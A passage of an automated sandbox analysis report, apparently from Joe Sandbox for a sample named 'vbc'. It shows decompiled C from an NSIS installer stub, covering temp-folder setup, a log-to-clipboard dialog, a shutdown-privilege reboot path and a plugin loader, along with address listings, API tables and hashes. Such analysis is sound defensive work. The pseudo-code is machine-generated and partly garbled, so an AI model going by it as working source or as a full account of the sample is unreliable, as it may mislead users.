                                                							__eflags = _t179 - _t189;
                                                							if(_t179 != _t189) {
                                                								goto L24;
                                                							}
                                                							goto L23;
                                                						}
                                                					} else {
                                                						goto L16;
                                                					}
                                                					do {
                                                						L16:
                                                						_t199 = _t199 + 2;
                                                						__eflags =  *_t199 - _t210;
                                                					} while ( *_t199 == _t210);
                                                					goto L17;
                                                				}
                                                				goto L37;
                                                			}















































                                                0x0040353b
                                                0x0040353c
                                                0x00403543
                                                0x00403546
                                                0x0040354d
                                                0x00403550
                                                0x00403563
                                                0x00403569
                                                0x0040356c
                                                0x0040356f
                                                0x0040357d
                                                0x00403585
                                                0x00403590
                                                0x004035a9
                                                0x004035ab
                                                0x004035b3
                                                0x004035b3
                                                0x004035be
                                                0x004035c0
                                                0x004035c0
                                                0x004035d5
                                                0x004035fa
                                                0x00403608
                                                0x0040360b
                                                0x00403612
                                                0x00403619
                                                0x00403619
                                                0x00403612
                                                0x0040361b
                                                0x00403620
                                                0x00403621
                                                0x0040362d
                                                0x00403631
                                                0x00403638
                                                0x00403646
                                                0x0040364b
                                                0x00403652
                                                0x00403656
                                                0x0040365a
                                                0x0040365c
                                                0x0040365c
                                                0x0040365a
                                                0x00403663
                                                0x0040366a
                                                0x00403670
                                                0x00403688
                                                0x00403698
                                                0x004036aa
                                                0x004036b1
                                                0x004036b3
                                                0x004036b4
                                                0x004036c5
                                                0x004036c9
                                                0x004036c9
                                                0x004036dc
                                                0x004036de
                                                0x004037d8
                                                0x004037d8
                                                0x004037db
                                                0x004037de
                                                0x00000000
                                                0x00000000
                                                0x004036e8
                                                0x004036e9
                                                0x004036ec
                                                0x004036f5
                                                0x004036f5
                                                0x004036f8
                                                0x004036fb
                                                0x004036fe
                                                0x00403701
                                                0x00403701
                                                0x00403701
                                                0x00403702
                                                0x00403706
                                                0x004037c6
                                                0x004037cf
                                                0x004037d1
                                                0x004037d4
                                                0x004037d7
                                                0x004037d7
                                                0x004037d7
                                                0x00000000
                                                0x0040370c
                                                0x0040370d
                                                0x0040370e
                                                0x00403712
                                                0x0040372c
                                                0x00403733
                                                0x00403746
                                                0x00403747
                                                0x0040375c
                                                0x00403761
                                                0x00403763
                                                0x00403765
                                                0x00403781
                                                0x00403788
                                                0x0040379b
                                                0x0040379c
                                                0x004037b1
                                                0x004037b7
                                                0x004037b9
                                                0x004037bb
                                                0x004037c3
                                                0x004037c5
                                                0x00000000
                                                0x004037c5
                                                0x004037bf
                                                0x004037c1
                                                0x004037e6
                                                0x004037ea
                                                0x004037f3
                                                0x004037f8
                                                0x004037fe
                                                0x00403809
                                                0x0040380b
                                                0x00403810
                                                0x00403812
                                                0x0040386a
                                                0x0040386f
                                                0x00403878
                                                0x0040387f
                                                0x00403882
                                                0x00403a59
                                                0x00403a59
                                                0x00403a5e
                                                0x00403a67
                                                0x00403a84
                                                0x00403afc
                                                0x00403afc
                                                0x00403b04
                                                0x00403b06
                                                0x00403b06
                                                0x00403b0c
                                                0x00403b0c
                                                0x00403a9b
                                                0x00403aa7
                                                0x00403ab8
                                                0x00403abf
                                                0x00403ac6
                                                0x00403ac6
                                                0x00403ace
                                                0x00403ada
                                                0x00403ae8
                                                0x00403af3
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00403adc
                                                0x00403adc
                                                0x00403add
                                                0x00403adf
                                                0x00403ae0
                                                0x00403ae1
                                                0x00403ae6
                                                0x00403af5
                                                0x00403af7
                                                0x00000000
                                                0x00403af7
                                                0x00000000
                                                0x00403ae6
                                                0x00403ada
                                                0x00403a71
                                                0x00403a78
                                                0x00403a78
                                                0x0040388e
                                                0x00403935
                                                0x00403935
                                                0x00403941
                                                0x00000000
                                                0x00403941
                                                0x0040389f
                                                0x004038a7
                                                0x004038f9
                                                0x004038f9
                                                0x004038ff
                                                0x00403906
                                                0x00403954
                                                0x00403956
                                                0x0040395b
                                                0x0040395d
                                                0x00403965
                                                0x00403965
                                                0x00403970
                                                0x0040397c
                                                0x00403982
                                                0x00403984
                                                0x00403a57
                                                0x00403a57
                                                0x00403a57
                                                0x00000000
                                                0x0040398a
                                                0x0040398a
                                                0x0040398c
                                                0x0040398d
                                                0x00403996
                                                0x0040398f
                                                0x0040398f
                                                0x0040398f
                                                0x0040399c
                                                0x004039a4
                                                0x004039ab
                                                0x004039b3
                                                0x004039b3
                                                0x004039c0
                                                0x004039cc
                                                0x004039d6
                                                0x004039d6
                                                0x004039d8
                                                0x004039df
                                                0x004039e9
                                                0x004039f5
                                                0x004039fb
                                                0x00403a01
                                                0x00403a04
                                                0x00403a0e
                                                0x00403a14
                                                0x00403a16
                                                0x00403a1a
                                                0x00403a2b
                                                0x00403a31
                                                0x00403a36
                                                0x00403a38
                                                0x00403a3b
                                                0x00403a41
                                                0x00403a41
                                                0x00403a38
                                                0x00403a16
                                                0x00403a44
                                                0x00403a4b
                                                0x00403a4b
                                                0x00403a4b
                                                0x00403a4b
                                                0x00403a52
                                                0x00000000
                                                0x00403a52
                                                0x00403984
                                                0x00403908
                                                0x0040390b
                                                0x0040390f
                                                0x00403914
                                                0x00403916
                                                0x00000000
                                                0x00000000
                                                0x00403922
                                                0x0040392d
                                                0x00403932
                                                0x00000000
                                                0x00403932
                                                0x004038b0
                                                0x004038c8
                                                0x004038d9
                                                0x004038da
                                                0x004038de
                                                0x004038e0
                                                0x004038ee
                                                0x004038f5
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x004038f5
                                                0x004038f7
                                                0x00000000
                                                0x004038f7
                                                0x0040381a
                                                0x00403826
                                                0x0040382b
                                                0x00403830
                                                0x00403832
                                                0x00000000
                                                0x00000000
                                                0x0040383a
                                                0x00403842
                                                0x00403853
                                                0x0040385b
                                                0x0040385d
                                                0x00403862
                                                0x00403864
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00403864
                                                0x00000000
                                                0x004037c1
                                                0x0040376a
                                                0x0040376c
                                                0x00000000
                                                0x00000000
                                                0x0040376e
                                                0x00403772
                                                0x00403776
                                                0x0040377d
                                                0x0040377d
                                                0x0040377d
                                                0x0040377d
                                                0x00000000
                                                0x0040377d
                                                0x00403778
                                                0x0040377b
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0040377b
                                                0x00403714
                                                0x00403718
                                                0x0040371b
                                                0x00403722
                                                0x00403722
                                                0x00000000
                                                0x00403722
                                                0x0040371d
                                                0x00403720
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00403720
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x004036ee
                                                0x004036ee
                                                0x004036ef
                                                0x004036f0
                                                0x004036f0
                                                0x00000000
                                                0x004036ee
                                                0x00000000

                                                APIs
                                                • SetErrorMode.KERNELBASE(00008001), ref: 00403550
                                                • GetVersionExW.KERNEL32(?), ref: 00403579
                                                • GetVersionExW.KERNEL32(0000011C), ref: 00403590
                                                • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 00403627
                                                • #17.COMCTL32(00000007,00000009,0000000B), ref: 00403663
                                                • OleInitialize.OLE32(00000000), ref: 0040366A
                                                • SHGetFileInfoW.SHELL32(0042B228,00000000,?,000002B4,00000000), ref: 00403688
                                                • GetCommandLineW.KERNEL32(00433F00,NSIS Error), ref: 0040369D
                                                • CharNextW.USER32(00000000), ref: 004036D6
                                                • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\), ref: 00403809
                                                • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 0040381A
                                                • lstrcatW.KERNEL32 ref: 00403826
                                                • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\), ref: 0040383A
                                                • lstrcatW.KERNEL32 ref: 00403842
                                                • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 00403853
                                                • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 0040385B
                                                • DeleteFileW.KERNELBASE(1033), ref: 0040386F
                                                • lstrcatW.KERNEL32 ref: 00403956
                                                • lstrcatW.KERNEL32 ref: 00403965
                                                  • Part of subcall function 00405AEB: CreateDirectoryW.KERNELBASE(?,00000000,00403520,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 00405AF1
                                                • lstrcatW.KERNEL32 ref: 00403970
                                                • lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,00441800,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,00440000,00000000,?), ref: 0040397C
                                                • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\), ref: 0040399C
                                                • DeleteFileW.KERNEL32(0042AA28,0042AA28,?,00436000,?), ref: 004039FB
                                                • CopyFileW.KERNEL32(00443800,0042AA28,00000001), ref: 00403A0E
                                                • CloseHandle.KERNEL32(00000000), ref: 00403A3B
                                                • OleUninitialize.OLE32 ref: 00403A5E
                                                • ExitProcess.KERNEL32 ref: 00403A78
                                                • GetCurrentProcess.KERNEL32(00000028,?), ref: 00403A8C
                                                • OpenProcessToken.ADVAPI32(00000000), ref: 00403A93
                                                • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403AA7
                                                • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00403AC6
                                                • ExitWindowsEx.USER32(00000002,80040002), ref: 00403AEB
                                                • ExitProcess.KERNEL32 ref: 00403B0C
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.680171348.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000004.00000002.680167485.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.680176661.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.680179731.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.680203041.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.680205712.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.680210866.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.680213751.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                                                Similarity
                                                • API ID: lstrcat$FileProcess$DirectoryExit$CurrentDeleteEnvironmentPathTempTokenVariableVersionWindows$AdjustCharCloseCommandCopyCreateErrorHandleInfoInitializeLineLookupModeNextOpenPrivilegePrivilegesUninitializeValuelstrcmpilstrlen
                                                • String ID: .tmp$1033$C:\Users\user\AppData\Local\Temp\$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
                                                • API String ID: 3859024572-2607992671
                                                • Opcode ID: e6a8171330b23895de066e2957319bca12562bbdb6a9eb3577c816747d85f5c1
                                                • Instruction ID: 4d4dc0a58e4858e72561def8a0259f0227da8af974c10a5ea2b310ef4b80d7a5
                                                • Opcode Fuzzy Hash: e6a8171330b23895de066e2957319bca12562bbdb6a9eb3577c816747d85f5c1
                                                • Instruction Fuzzy Hash: 66E10670A00214AADB10AFB59D45BAF3AB8EF4470AF14847FF545B22D1DB7C8A41CB6D
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 143 4056de-4056f9 144 405888-40588f 143->144 145 4056ff-4057c6 GetDlgItem * 3 call 4044ce call 404e27 GetClientRect GetSystemMetrics SendMessageW * 2 143->145 147 405891-4058b3 GetDlgItem CreateThread CloseHandle 144->147 148 4058b9-4058c6 144->148 166 4057e4-4057e7 145->166 167 4057c8-4057e2 SendMessageW * 2 145->167 147->148 150 4058e4-4058ee 148->150 151 4058c8-4058ce 148->151 155 4058f0-4058f6 150->155 156 405944-405948 150->156 153 4058d0-4058df ShowWindow * 2 call 4044ce 151->153 154 405909-405912 call 404500 151->154 153->150 163 405917-40591b 154->163 160 4058f8-405904 call 404472 155->160 161 40591e-40592e ShowWindow 155->161 156->154 158 40594a-405950 156->158 158->154 168 405952-405965 SendMessageW 158->168 160->154 164 405930-405939 call 40559f 161->164 165 40593e-40593f call 404472 161->165 164->165 165->156 172 4057f7-40580e call 404499 166->172 173 4057e9-4057f5 SendMessageW 166->173 167->166 174 405a67-405a69 168->174 175 40596b-405996 CreatePopupMenu call 40657a AppendMenuW 168->175 182 405810-405824 ShowWindow 172->182 183 405844-405865 GetDlgItem SendMessageW 172->183 173->172 174->163 180 405998-4059a8 GetWindowRect 175->180 181 4059ab-4059c0 TrackPopupMenu 175->181 180->181 181->174 185 4059c6-4059dd 181->185 186 405833 182->186 187 405826-405831 ShowWindow 182->187 183->174 184 40586b-405883 SendMessageW * 2 183->184 184->174 189 4059e2-4059fd SendMessageW 185->189 188 405839-40583f call 4044ce 186->188 187->188 188->183 189->189 190 4059ff-405a22 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 189->190 192 405a24-405a4b SendMessageW 190->192 192->192 193 405a4d-405a61 GlobalUnlock SetClipboardData CloseClipboard 192->193 193->174
                                                C-Code - Quality: 95%
                                                			E004056DE(struct HWND__* _a4, long _a8, long _a12, unsigned int _a16) {
                                                				struct HWND__* _v8;
                                                				long _v12;
                                                				struct tagRECT _v28;
                                                				void* _v36;
                                                				signed int _v40;
                                                				int _v44;
                                                				int _v48;
                                                				signed int _v52;
                                                				int _v56;
                                                				void* _v60;
                                                				void* _v68;
                                                				void* __ebx;
                                                				void* __edi;
                                                				void* __esi;
                                                				struct HWND__* _t94;
                                                				long _t95;
                                                				int _t100;
                                                				void* _t108;
                                                				intOrPtr _t119;
                                                				void* _t127;
                                                				intOrPtr _t130;
                                                				struct HWND__* _t134;
                                                				int _t156;
                                                				int _t159;
                                                				struct HMENU__* _t164;
                                                				struct HWND__* _t168;
                                                				struct HWND__* _t169;
                                                				int _t171;
                                                				void* _t172;
                                                				short* _t173;
                                                				short* _t175;
                                                				int _t177;
                                                
                                                				_t169 =  *0x433ee4;
                                                				_t156 = 0;
                                                				_v8 = _t169;
                                                				if(_a8 != 0x110) {
                                                					if(_a8 == 0x405) {
                                                						_t127 = CreateThread(0, 0, E00405672, GetDlgItem(_a4, 0x3ec), 0,  &_v12); // executed
                                                						CloseHandle(_t127); // executed
                                                					}
                                                					if(_a8 != 0x111) {
                                                						L17:
                                                						_t171 = 1;
                                                						if(_a8 != 0x404) {
                                                							L25:
                                                							if(_a8 != 0x7b) {
                                                								goto L20;
                                                							}
                                                							_t94 = _v8;
                                                							if(_a12 != _t94) {
                                                								goto L20;
                                                							}
                                                							_t95 = SendMessageW(_t94, 0x1004, _t156, _t156);
                                                							_a8 = _t95;
                                                							if(_t95 <= _t156) {
                                                								L36:
                                                								return 0;
                                                							}
                                                							_t164 = CreatePopupMenu();
                                                							AppendMenuW(_t164, _t156, _t171, E0040657A(_t156, _t164, _t171, _t156, 0xffffffe1));
                                                							_t100 = _a16;
                                                							_t159 = _a16 >> 0x10;
                                                							if(_a16 == 0xffffffff) {
                                                								GetWindowRect(_v8,  &_v28);
                                                								_t100 = _v28.left;
                                                								_t159 = _v28.top;
                                                							}
                                                							if(TrackPopupMenu(_t164, 0x180, _t100, _t159, _t156, _a4, _t156) == _t171) {
                                                								_v60 = _t156;
                                                								_v48 = 0x42d268;
                                                								_v44 = 0x1000;
                                                								_a4 = _a8;
                                                								do {
                                                									_a4 = _a4 - 1;
                                                									_t171 = _t171 + SendMessageW(_v8, 0x1073, _a4,  &_v68) + 2;
                                                								} while (_a4 != _t156);
                                                								OpenClipboard(_t156);
                                                								EmptyClipboard();
                                                								_t108 = GlobalAlloc(0x42, _t171 + _t171);
                                                								_a4 = _t108;
                                                								_t172 = GlobalLock(_t108);
                                                								do {
                                                									_v48 = _t172;
                                                									_t173 = _t172 + SendMessageW(_v8, 0x1073, _t156,  &_v68) * 2;
                                                									 *_t173 = 0xd;
                                                									_t175 = _t173 + 2;
                                                									 *_t175 = 0xa;
                                                									_t172 = _t175 + 2;
                                                									_t156 = _t156 + 1;
                                                								} while (_t156 < _a8);
                                                								GlobalUnlock(_a4);
                                                								SetClipboardData(0xd, _a4);
                                                								CloseClipboard();
                                                							}
                                                							goto L36;
                                                						}
                                                						if( *0x433ecc == _t156) {
                                                							ShowWindow( *0x434f08, 8);
                                                							if( *0x434f8c == _t156) {
                                                								_t119 =  *0x42c240; // 0x900bec
                                                								_t57 = _t119 + 0x34; // 0xffffffd6
                                                								E0040559F( *_t57, _t156);
                                                							}
                                                							E00404472(_t171);
                                                							goto L25;
                                                						}
                                                						 *0x42ba38 = 2;
                                                						E00404472(0x78);
                                                						goto L20;
                                                					} else {
                                                						if(_a12 != 0x403) {
                                                							L20:
                                                							return E00404500(_a8, _a12, _a16);
                                                						}
                                                						ShowWindow( *0x433ed0, _t156);
                                                						ShowWindow(_t169, 8);
                                                						E004044CE(_t169);
                                                						goto L17;
                                                					}
                                                				}
                                                				_v52 = _v52 | 0xffffffff;
                                                				_v40 = _v40 | 0xffffffff;
                                                				_t177 = 2;
                                                				_v60 = _t177;
                                                				_v56 = 0;
                                                				_v48 = 0;
                                                				_v44 = 0;
                                                				asm("stosd");
                                                				asm("stosd");
                                                				_t130 =  *0x434f10;
                                                				_a8 =  *((intOrPtr*)(_t130 + 0x5c));
                                                				_a12 =  *((intOrPtr*)(_t130 + 0x60));
                                                				 *0x433ed0 = GetDlgItem(_a4, 0x403);
                                                				 *0x433ec8 = GetDlgItem(_a4, 0x3ee);
                                                				_t134 = GetDlgItem(_a4, 0x3f8);
                                                				 *0x433ee4 = _t134;
                                                				_v8 = _t134;
                                                				E004044CE( *0x433ed0);
                                                				 *0x433ed4 = E00404E27(4);
                                                				 *0x433eec = 0;
                                                				GetClientRect(_v8,  &_v28);
                                                				_v52 = _v28.right - GetSystemMetrics(_t177);
                                                				SendMessageW(_v8, 0x1061, 0,  &_v60); // executed
                                                				SendMessageW(_v8, 0x1036, 0x4000, 0x4000); // executed
                                                				if(_a8 >= 0) {
                                                					SendMessageW(_v8, 0x1001, 0, _a8);
                                                					SendMessageW(_v8, 0x1026, 0, _a8);
                                                				}
                                                				if(_a12 >= _t156) {
                                                					SendMessageW(_v8, 0x1024, _t156, _a12);
                                                				}
                                                				_push( *((intOrPtr*)(_a16 + 0x30)));
                                                				_push(0x1b);
                                                				E00404499(_a4);
                                                				if(( *0x434f18 & 0x00000003) != 0) {
                                                					ShowWindow( *0x433ed0, _t156);
                                                					if(( *0x434f18 & 0x00000002) != 0) {
                                                						 *0x433ed0 = _t156;
                                                					} else {
                                                						ShowWindow(_v8, 8);
                                                					}
                                                					E004044CE( *0x433ec8);
                                                				}
                                                				_t168 = GetDlgItem(_a4, 0x3ec);
                                                				SendMessageW(_t168, 0x401, _t156, 0x75300000);
                                                				if(( *0x434f18 & 0x00000004) != 0) {
                                                					SendMessageW(_t168, 0x409, _t156, _a12);
                                                					SendMessageW(_t168, 0x2001, _t156, _a8);
                                                				}
                                                				goto L36;
                                                			}



































                                                0x004056e6
                                                0x004056ec
                                                0x004056f6
                                                0x004056f9
                                                0x0040588f
                                                0x004058ac
                                                0x004058b3
                                                0x004058b3
                                                0x004058c6
                                                0x004058e4
                                                0x004058e6
                                                0x004058ee
                                                0x00405944
                                                0x00405948
                                                0x00000000
                                                0x00000000
                                                0x0040594a
                                                0x00405950
                                                0x00000000
                                                0x00000000
                                                0x0040595a
                                                0x00405962
                                                0x00405965
                                                0x00405a67
                                                0x00000000
                                                0x00405a67
                                                0x00405974
                                                0x0040597f
                                                0x00405988
                                                0x00405993
                                                0x00405996
                                                0x0040599f
                                                0x004059a5
                                                0x004059a8
                                                0x004059a8
                                                0x004059c0
                                                0x004059c9
                                                0x004059cc
                                                0x004059d3
                                                0x004059da
                                                0x004059e2
                                                0x004059e2
                                                0x004059f9
                                                0x004059f9
                                                0x00405a00
                                                0x00405a06
                                                0x00405a12
                                                0x00405a19
                                                0x00405a22
                                                0x00405a24
                                                0x00405a27
                                                0x00405a36
                                                0x00405a39
                                                0x00405a3f
                                                0x00405a40
                                                0x00405a46
                                                0x00405a47
                                                0x00405a48
                                                0x00405a50
                                                0x00405a5b
                                                0x00405a61
                                                0x00405a61
                                                0x00000000
                                                0x004059c0
                                                0x004058f6
                                                0x00405926
                                                0x0040592e
                                                0x00405930
                                                0x00405936
                                                0x00405939
                                                0x00405939
                                                0x0040593f
                                                0x00000000
                                                0x0040593f
                                                0x004058fa
                                                0x00405904
                                                0x00000000
                                                0x004058c8
                                                0x004058ce
                                                0x00405909
                                                0x00000000
                                                0x00405912
                                                0x004058d7
                                                0x004058dc
                                                0x004058df
                                                0x00000000
                                                0x004058df
                                                0x004058c6
                                                0x004056ff
                                                0x00405703
                                                0x0040570b
                                                0x0040570f
                                                0x00405712
                                                0x00405715
                                                0x00405718
                                                0x0040571b
                                                0x0040571c
                                                0x0040571d
                                                0x00405736
                                                0x00405739
                                                0x00405743
                                                0x00405752
                                                0x0040575a
                                                0x00405762
                                                0x00405767
                                                0x0040576a
                                                0x00405776
                                                0x0040577f
                                                0x00405788
                                                0x004057aa
                                                0x004057b0
                                                0x004057c1
                                                0x004057c6
                                                0x004057d4
                                                0x004057e2
                                                0x004057e2
                                                0x004057e7
                                                0x004057f5
                                                0x004057f5
                                                0x004057fa
                                                0x004057fd
                                                0x00405802
                                                0x0040580e
                                                0x00405817
                                                0x00405824
                                                0x00405833
                                                0x00405826
                                                0x0040582b
                                                0x0040582b
                                                0x0040583f
                                                0x0040583f
                                                0x00405853
                                                0x0040585c
                                                0x00405865
                                                0x00405875
                                                0x00405881
                                                0x00405881
                                                0x00000000

                                                APIs
                                                • GetDlgItem.USER32(?,00000403), ref: 0040573C
                                                • GetDlgItem.USER32(?,000003EE), ref: 0040574B
                                                • GetClientRect.USER32 ref: 00405788
                                                • GetSystemMetrics.USER32 ref: 0040578F
                                                • SendMessageW.USER32(?,00001061,00000000,?), ref: 004057B0
                                                • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004057C1
                                                • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004057D4
                                                • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 004057E2
                                                • SendMessageW.USER32(?,00001024,00000000,?), ref: 004057F5
                                                • ShowWindow.USER32(00000000,?), ref: 00405817
                                                • ShowWindow.USER32(?,00000008), ref: 0040582B
                                                • GetDlgItem.USER32(?,000003EC), ref: 0040584C
                                                • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 0040585C
                                                • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 00405875
                                                • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 00405881
                                                • GetDlgItem.USER32(?,000003F8), ref: 0040575A
                                                  • Part of subcall function 004044CE: SendMessageW.USER32(00000028,?,00000001,004042F9), ref: 004044DC
                                                • GetDlgItem.USER32(?,000003EC), ref: 0040589E
                                                • CreateThread.KERNELBASE(00000000,00000000,Function_00005672,00000000), ref: 004058AC
                                                • CloseHandle.KERNELBASE(00000000), ref: 004058B3
                                                • ShowWindow.USER32(00000000), ref: 004058D7
                                                • ShowWindow.USER32(?,00000008), ref: 004058DC
                                                • ShowWindow.USER32(00000008), ref: 00405926
                                                • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040595A
                                                • CreatePopupMenu.USER32 ref: 0040596B
                                                • AppendMenuW.USER32 ref: 0040597F
                                                • GetWindowRect.USER32 ref: 0040599F
                                                • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004059B8
                                                • SendMessageW.USER32(?,00001073,00000000,?), ref: 004059F0
                                                • OpenClipboard.USER32(00000000), ref: 00405A00
                                                • EmptyClipboard.USER32 ref: 00405A06
                                                • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405A12
                                                • GlobalLock.KERNEL32 ref: 00405A1C
                                                • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405A30
                                                • GlobalUnlock.KERNEL32(00000000), ref: 00405A50
                                                • SetClipboardData.USER32 ref: 00405A5B
                                                • CloseClipboard.USER32 ref: 00405A61
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.680171348.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000004.00000002.680167485.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.680176661.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.680179731.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.680203041.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.680205712.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.680210866.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.680213751.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                                                Similarity
                                                • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                • String ID: {
                                                • API String ID: 590372296-366298937
                                                • Opcode ID: efbbf4d88f7660e4c87201c03f03245d3270aa31951a4a241d93bb0c475bbbe6
                                                • Instruction ID: 6b97441d6f4cfe62a880681573964a63c423f2dd70b2063085686802d9cc5617
                                                • Opcode Fuzzy Hash: efbbf4d88f7660e4c87201c03f03245d3270aa31951a4a241d93bb0c475bbbe6
                                                • Instruction Fuzzy Hash: C8B169B1900608FFDB119FA0DD85AAE7B79FB44355F00803AFA41BA1A0C7755E51DF58
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 95%
                                                			E73281BFF() {
                                                				signed int _v8;
                                                				signed int _v12;
                                                				signed int _v16;
                                                				signed int _v20;
                                                				WCHAR* _v24;
                                                				WCHAR* _v28;
                                                				signed int _v32;
                                                				signed int _v36;
                                                				signed int _v40;
                                                				signed int _v44;
                                                				WCHAR* _v48;
                                                				signed int _v52;
                                                				void* _v56;
                                                				intOrPtr _v60;
                                                				WCHAR* _t208;
                                                				signed int _t211;
                                                				void* _t213;
                                                				void* _t215;
                                                				WCHAR* _t217;
                                                				void* _t225;
                                                				struct HINSTANCE__* _t226;
                                                				struct HINSTANCE__* _t227;
                                                				struct HINSTANCE__* _t229;
                                                				signed short _t231;
                                                				struct HINSTANCE__* _t234;
                                                				struct HINSTANCE__* _t236;
                                                				void* _t237;
                                                				intOrPtr* _t238;
                                                				void* _t249;
                                                				signed char _t250;
                                                				signed int _t251;
                                                				void* _t255;
                                                				struct HINSTANCE__* _t257;
                                                				void* _t258;
                                                				signed int _t260;
                                                				signed int _t261;
                                                				signed short* _t264;
                                                				signed int _t269;
                                                				signed int _t272;
                                                				signed int _t274;
                                                				void* _t277;
                                                				void* _t281;
                                                				struct HINSTANCE__* _t283;
                                                				signed int _t286;
                                                				void _t287;
                                                				signed int _t288;
                                                				signed int _t300;
                                                				signed int _t301;
                                                				signed short _t304;
                                                				void* _t305;
                                                				signed int _t309;
                                                				signed int _t312;
                                                				signed int _t315;
                                                				signed int _t316;
                                                				signed int _t317;
                                                				signed short* _t321;
                                                				WCHAR* _t322;
                                                				WCHAR* _t324;
                                                				WCHAR* _t325;
                                                				struct HINSTANCE__* _t326;
                                                				void* _t328;
                                                				signed int _t331;
                                                				void* _t332;
                                                
                                                				_t283 = 0;
                                                				_v32 = 0;
                                                				_v36 = 0;
                                                				_v16 = 0;
                                                				_v8 = 0;
                                                				_v40 = 0;
                                                				_t332 = 0;
                                                				_v52 = 0;
                                                				_v44 = 0;
                                                				_t208 = E732812BB();
                                                				_v24 = _t208;
                                                				_v28 = _t208;
                                                				_v48 = E732812BB();
                                                				_t321 = E732812E3();
                                                				_v56 = _t321;
                                                				_v12 = _t321;
                                                				while(1) {
                                                					_t211 = _v32;
                                                					_v60 = _t211;
                                                					if(_t211 != _t283 && _t332 == _t283) {
                                                						break;
                                                					}
                                                					_t286 =  *_t321 & 0x0000ffff;
                                                					_t213 = _t286 - _t283;
                                                					if(_t213 == 0) {
                                                						_t37 =  &_v32;
                                                						 *_t37 = _v32 | 0xffffffff;
                                                						__eflags =  *_t37;
                                                						L20:
                                                						_t215 = _v60 - _t283;
                                                						if(_t215 == 0) {
                                                							__eflags = _t332 - _t283;
                                                							 *_v28 = _t283;
                                                							if(_t332 == _t283) {
                                                								_t255 = GlobalAlloc(0x40, 0x1ca4); // executed
                                                								_t332 = _t255;
                                                								 *(_t332 + 0x1010) = _t283;
                                                								 *(_t332 + 0x1014) = _t283;
                                                							}
                                                							_t287 = _v36;
                                                							_t47 = _t332 + 8; // 0x8
                                                							_t217 = _t47;
                                                							_t48 = _t332 + 0x808; // 0x808
                                                							_t322 = _t48;
                                                							 *_t332 = _t287;
                                                							_t288 = _t287 - _t283;
                                                							__eflags = _t288;
                                                							 *_t217 = _t283;
                                                							 *_t322 = _t283;
                                                							 *(_t332 + 0x1008) = _t283;
